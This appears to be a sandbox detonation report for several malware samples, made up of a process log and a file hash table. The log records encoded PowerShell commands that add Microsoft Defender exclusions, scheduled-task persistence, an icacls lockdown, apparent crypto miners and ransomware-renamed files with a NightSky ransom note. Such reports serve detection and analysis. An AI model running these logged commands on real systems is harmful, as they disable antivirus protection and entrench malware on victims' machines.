"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6488 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5752 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6272 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4876 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5604 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2144,16318003771006949765,8573786079794170067,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6292 /prefetch:8
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap5033:378:7zEvent25235
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap4247:762:7zEvent21565
C:\Users\Admin\Downloads\c90b5bb05452d29be5614df538fe6c275ef607a8615325a78a370a6402976273.exe
"C:\Users\Admin\Downloads\c90b5bb05452d29be5614df538fe6c275ef607a8615325a78a370a6402976273.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
C:\Windows\SYSTEM32\cmd.exe
"cmd" cmd /c taskkill /f /PID "4904"
C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "zqawds" /tr "C:\Users\Admin\AppData\Roaming\zqawds.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "zqawds" /tr "C:\Users\Admin\AppData\Roaming\zqawds.exe"
C:\Windows\system32\taskkill.exe
taskkill /f /PID "4904"
C:\Users\Admin\Downloads\b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe
"C:\Users\Admin\Downloads\b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe"
C:\Users\Admin\Downloads\1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591.exe
"C:\Users\Admin\Downloads\1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591.exe"
C:\Users\Admin\Downloads\8c1a72991fb04dc3a8cf89605fb85150ef0e742472a0c58b8fa942a1f04877b0.exe
"C:\Users\Admin\Downloads\8c1a72991fb04dc3a8cf89605fb85150ef0e742472a0c58b8fa942a1f04877b0.exe"
C:\Users\Admin\Downloads\ebf8f470ffc1fa2c68fb9674c6e9842f9b5e5a15e2d37b11ffdb1de90d017b92.exe
"C:\Users\Admin\Downloads\ebf8f470ffc1fa2c68fb9674c6e9842f9b5e5a15e2d37b11ffdb1de90d017b92.exe"
C:\Users\Admin\Downloads\c90b5bb05452d29be5614df538fe6c275ef607a8615325a78a370a6402976273.exe
"C:\Users\Admin\Downloads\c90b5bb05452d29be5614df538fe6c275ef607a8615325a78a370a6402976273.exe"
C:\Users\Admin\Downloads\ebf8f470ffc1fa2c68fb9674c6e9842f9b5e5a15e2d37b11ffdb1de90d017b92.EXE
"C:\Users\Admin\Downloads\ebf8f470ffc1fa2c68fb9674c6e9842f9b5e5a15e2d37b11ffdb1de90d017b92.EXE"
C:\Users\Admin\AppData\Roaming\xmrmine.exe
C:\Users\Admin\AppData\Roaming\xmrmine.exe
C:\Users\Admin\AppData\Roaming\etcmin.exe
C:\Users\Admin\AppData\Roaming\etcmin.exe
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
C:\Windows\SYSTEM32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\zqawds.exe"
C:\Users\Admin\AppData\Roaming\zqawds.exe
C:\Users\Admin\AppData\Roaming\zqawds.exe
C:\Windows\SYSTEM32\cmd.exe
"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
C:\Users\Admin\Downloads\99ee06f5fb4f0aa90678d6a6405d2d01138bcd128c6d2aabecda07c110361ba2.exe
"C:\Users\Admin\Downloads\99ee06f5fb4f0aa90678d6a6405d2d01138bcd128c6d2aabecda07c110361ba2.exe"
C:\Users\Admin\Downloads\b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe
"C:\Users\Admin\Downloads\b1c5fd5c0f6a2760eb638414d9bf9b7536b81f45edbd9d509dd085346c67a6ae.exe"
C:\Users\Admin\Downloads\c90b5bb05452d29be5614df538fe6c275ef607a8615325a78a370a6402976273.exe
"C:\Users\Admin\Downloads\c90b5bb05452d29be5614df538fe6c275ef607a8615325a78a370a6402976273.exe"
C:\Users\Admin\Downloads\1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591.exe
"C:\Users\Admin\Downloads\1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591.exe"
C:\Users\Admin\Downloads\8c1a72991fb04dc3a8cf89605fb85150ef0e742472a0c58b8fa942a1f04877b0.exe
"C:\Users\Admin\Downloads\8c1a72991fb04dc3a8cf89605fb85150ef0e742472a0c58b8fa942a1f04877b0.exe"
C:\Users\Admin\Downloads\699159e695e230a48d94b6103b48940ed596d0b48fb6d936c04d86eed539cecd.exe
"C:\Users\Admin\Downloads\699159e695e230a48d94b6103b48940ed596d0b48fb6d936c04d86eed539cecd.exe"
C:\Users\Admin\Downloads\ebf8f470ffc1fa2c68fb9674c6e9842f9b5e5a15e2d37b11ffdb1de90d017b92.exe
"C:\Users\Admin\Downloads\ebf8f470ffc1fa2c68fb9674c6e9842f9b5e5a15e2d37b11ffdb1de90d017b92.exe"
C:\Users\Admin\AppData\Roaming\xmrmine.exe
C:\Users\Admin\AppData\Roaming\xmrmine.exe
C:\Users\Admin\AppData\Roaming\etcmin.exe
C:\Users\Admin\AppData\Roaming\etcmin.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "zqawds" /tr "C:\Users\Admin\AppData\Roaming\zqawds.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "zqawds" /tr "C:\Users\Admin\AppData\Roaming\zqawds.exe"
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\309083e1-c7ce-4856-8974-714ff3572443" /deny *S-1-1-0:(OI)(CI)(DE,DC)
C:\Users\Admin\Downloads\99ee06f5fb4f0aa90678d6a6405d2d01138bcd128c6d2aabecda07c110361ba2.exe
"C:\Users\Admin\Downloads\99ee06f5fb4f0aa90678d6a6405d2d01138bcd128c6d2aabecda07c110361ba2.exe" --Admin IsNotAutoStart IsNotTask
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 3348 -ip 3348
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3348 -s 1592
C:\Windows\system32\cmd.exe
"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\zqawds.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit
C:\Users\Admin\AppData\Roaming\zqawds.exe
C:\Users\Admin\AppData\Roaming\zqawds.exe
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'
C:\Windows\SYSTEM32\cmd.exe
"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
C:\Users\Admin\appdata\roaming\rtksmbs.exe
"C:\Users\Admin\appdata\roaming\rtksmbs.exe"
C:\Users\Admin\appdata\roaming\serverpatch.exe
"C:\Users\Admin\appdata\roaming\serverpatch.exe"
C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "zqawds" /tr "C:\Users\Admin\AppData\Roaming\zqawds.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "zqawds" /tr "C:\Users\Admin\AppData\Roaming\zqawds.exe"
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe"
C:\Windows\system32\cmd.exe
"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost64.exe"
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1896 -parentBuildID 20240401114208 -prefsHandle 1936 -prefMapHandle 1932 -prefsLen 27434 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {da5417e8-2390-4983-8129-e25aedfb4270} 2680 "\\.\pipe\gecko-crash-server-pipe.2680" gpu
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"' & exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"' & exit
C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe
"C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe"
C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "wixbkzqmha"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "rtksmbs" /tr '"c:\users\admin\appdata\roaming\rtksmbs.exe"'
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "serverpatch" /tr '"c:\users\admin\appdata\roaming\serverpatch.exe"'
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2412 -parentBuildID 20240401114208 -prefsHandle 2404 -prefMapHandle 2400 -prefsLen 27312 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2821ff89-e46f-49a5-805d-ec7b0bb063ff} 2680 "\\.\pipe\gecko-crash-server-pipe.2680" socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3124 -childID 1 -isForBrowser -prefsHandle 3048 -prefMapHandle 3128 -prefsLen 22698 -prefMapSize 244658 -jsInitHandle 1348 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9d4b02cd-6b44-4758-99d2-b4e4263773a8} 2680 "\\.\pipe\gecko-crash-server-pipe.2680" tab
Network
Files
| SHA512 | cc84e607b2b3d701dd9d4d4c0cd5fd286c4deb94c1d8f6c2cc1ca1ba6450de3750302c6e44709af83726755ece0700487500594811307649f12dc0209bb5d92f |
C:\Users\Admin\Pictures\1B0BHOb.KeOBVFSB4
| MD5 | b6b41eeac18b15cf2b2477729e82cd09 |
| SHA1 | c578a85e24ca3113b369edbe5f1aa4d4a174f079 |
| SHA256 | 5abeeab93a72f07f6fa6d216bfa7fa881643402c6d93d5984df9294a06565ff6 |
| SHA512 | f1e4167807a9476ea2a60b4b50ed5694b489bbabeb2695802c9b220d6b803c2fc4282f54da64b1500e6efcf9228e9169082e0caddb343f08a753f5b4a0dcc21e |
C:\Users\Admin\Pictures\13VnFaf.KeOBVFSB4
| MD5 | b93a678f9b7758107a15dd9b99679906 |
| SHA1 | 2f4e4304c55a2156d38edd83c81ebc22d8b94037 |
| SHA256 | 8ab5b109fa2297f3b49504638929a6e774ac6e9048eddbcc11eeb6e4fba712b8 |
| SHA512 | 4ca89431d65a09b516c27d1dd6cbf6f642ca33867a593d8040eecc95a01c3b5ab3d0a16802ea1f0dec95f3f7340a1a072d37af1d4e325cb20365c1a36c82dea4 |
C:\Users\Admin\Pictures\0NoQR5o.KeOBVFSB4
| MD5 | 25cfd72eada1baf87b663484f0907f0b |
| SHA1 | 00ac273fa98c5e5954ead666deb3154bb09de321 |
| SHA256 | 90449698cf8318df1f2c5a31e7210ce3feeff8c3b27c444a9b2a5bf9d3b7abd0 |
| SHA512 | aad11e18be069952e789e7c65bb296a11ba814d4c1f794418a111ef6f022943fb562d2d7ff3b72b8c3c436994146ab3f0e8f7d90c3c1284c3feb7aedea5771cc |
C:\ProgramData\KeOBVFSB4.bmp
| MD5 | 1145fd5da55539971e438dbafac964e5 |
| SHA1 | 53f34e5f25246e65fb9356869a1b9e27ee14c1dd |
| SHA256 | 3ae7f7943f3a84c6fdd168e1c5d63ae5959d42013f23398f85d0e8a9e15eee7f |
| SHA512 | d407b5bf0d44d27fcd2412de33fec08e6718321f75a230fdaf32b13fd2e0fab942fea107ba166507bdcd585e57450270eeec16f8a4dcae63b39d21a620c418ab |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 5d907bf8988a97e498b013944dd5b754 |
| SHA1 | 15ece18958457e0671fa8f55d57b75da381efafa |
| SHA256 | ec1f2ff8607a6f0e8ed223d3f72b0a0af3533d9d08bb6fc7da93e2f4d34b8324 |
| SHA512 | d8e1f7f7274dddc58d9c2ddff51fdf894330e480533809b88787084c11c45644ca39593ddf8161b6435ece755bfe52067e0c34d8904398cb874b0bdcc3981a5f |
C:\Users\Admin\Downloads\8c1a72991fb04dc3a8cf89605fb85150ef0e742472a0c58b8fa942a1f04877b0.zip
| MD5 | 19ce5606379a1924550a692e566abade |
| SHA1 | 83a29f7b03e5f4f61cd8cbb518abe0526e8e143d |
| SHA256 | f68ccf39bc979d881d1e151658b25b979eeaee7fc0268c39472279ee85ef8353 |
| SHA512 | 8c4d91060fbc8bf21ba1691f3013abc6e5d6b0522e6b7db3bb5a3a98acab2fb22a41ecc548d753e110764be69e94a442a9609d0e0bda135a646f8473a577041f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 56501d02272ed49ab0ae07d8bd31ecad |
| SHA1 | 95b4c1f3297f45b2c31231f020db69ab3a614751 |
| SHA256 | a7beb62525f6fe22160dbc4612a9a226218e127efd3276f7c4ffdc3bb8542603 |
| SHA512 | f6666b944f8530943b2ca2e21e073b1c3b0e5159f23e792e7a1ec0bd683094f058ce15df6185637ba4a8cde2b91b73484a74672f32c76b53f7343dfb77c3eafa |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 94766d3e47ea817089e35174d0394f2f |
| SHA1 | 254e36793c58f7983bedc5b2ed6bf994ecbc3c02 |
| SHA256 | f5d169b41cac1b0240b7de4fc8953d6fe384643a857779c1ea813cfeea5f558b |
| SHA512 | 75b5685c860695933eddb3bc2f401ebf0e52f91bc00b1b61ea873a35fb1412a9614842eee218f0683847d3eef82c9eb801f0777469a7b64a4f28bfc2d6c94526 |
memory/4604-1118-0x00007FF830530000-0x00007FF830532000-memory.dmp
memory/4604-1119-0x00007FF72D590000-0x00007FF72DEE0000-memory.dmp
C:\$Recycle.Bin\S-1-5-21-2278412438-3475196406-3686434223-1000\desktop.ini
| MD5 | a526b9e7c716b3489d8cc062fbce4005 |
| SHA1 | 2df502a944ff721241be20a9e449d2acd07e0312 |
| SHA256 | e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066 |
| SHA512 | d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88 |
C:\Users\Admin\NightSkyReadMe.hta
| MD5 | 77271f4222f5c197f203d16052e09015 |
| SHA1 | c549b429ec037ff0e085dcee7b8ed636fc258f22 |
| SHA256 | 29e255933d04e25882cca4d0be597b4eaa36ee729b62ca93fe4789b0283641e3 |
| SHA512 | 1ecd1cc449fdfbbae5312988904bc8e0b2799fdf28ce902e9788320c94c60e7ecde1f5245c7e312a9e2e14d17db227b1a1dca0c94c7f670c4a8a0ecc22fd5a0d |
memory/1080-1395-0x00007FF72D590000-0x00007FF72DEE0000-memory.dmp
memory/5596-1399-0x00007FF72D590000-0x00007FF72DEE0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 43c390cf7fb8802ac0a0ea3caebaddc6 |
| SHA1 | 92e1505e4dc87e93f354d3dcba1188edb217cc4d |
| SHA256 | d9c4c3c4c5d630b9ea1d84ea31f4de785c7482b997ea7930ef1c3caf073a6af6 |
| SHA512 | 24b3fce0bb8a81f561bf5699b7c21e93f9b7c58826f7efedf3114ffe0c91cf39b1fd39fe09fec419555c899ceaddcbce2bfcd999b46affbd0944f2208f1e0135 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 27cf2a5e940ff078d952298ca3f7040e |
| SHA1 | 03cef77c0c9ae20de71dd485ed4bcf2ec905268d |
| SHA256 | 0071f787762ca66cc64246b51390830113b64fec34cf2454993583c12d27b022 |
| SHA512 | 8a5aa48970d0387c05d2ffc7e4dc482753a0f2ad97c0e6a4456d91f57cbc43fa365af3320fcdcc66c9156397fc1b7ce2ac56c959541bfcd3bfd3458670766a91 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 40a76a58484e718c8ac29a42e957f629 |
| SHA1 | 3e9d0dfd71ff872dc8f7d09a20d7270e6d70b572 |
| SHA256 | f94c1c205f93fd3a3299996198b162309a21207a33e4c13b972fb8be88ffa0c3 |
| SHA512 | 1fae6f09bd1956df094e1f10c28bbf88e30b46e86723e2b0ccedd6202543c39804877fc198846bd007443709079b89ed89fac19f86259fe74dc54369d767f4c1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\temp-index
| MD5 | 85d75f1251c92b62abab613b2e8184bf |
| SHA1 | ee9f5ab3c12881b7ee7b7cda80a333953fad4b55 |
| SHA256 | 1934f23a6399e4afa3e384e5adbbc6a198b81da3992158e5e47169e9447ec204 |
| SHA512 | f0668e3278dc439bff37c8e1e62313187ae3ac1a1da9ccb93336898a0619e7250b61f2f16a9143d7edf947e4895f4fe38bcbb63c9f99abaa14f2b6ee8c78bcab |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005
| MD5 | e42eb6b987a46c895dcb7fa84dd38e61 |
| SHA1 | a23c3d5710c227aab14b5c6ae1eb05b0a537b8cd |
| SHA256 | 2186cf3fb1356149de2896f8c226cd09ae6de2d8986c738ff0719dd23724fe70 |
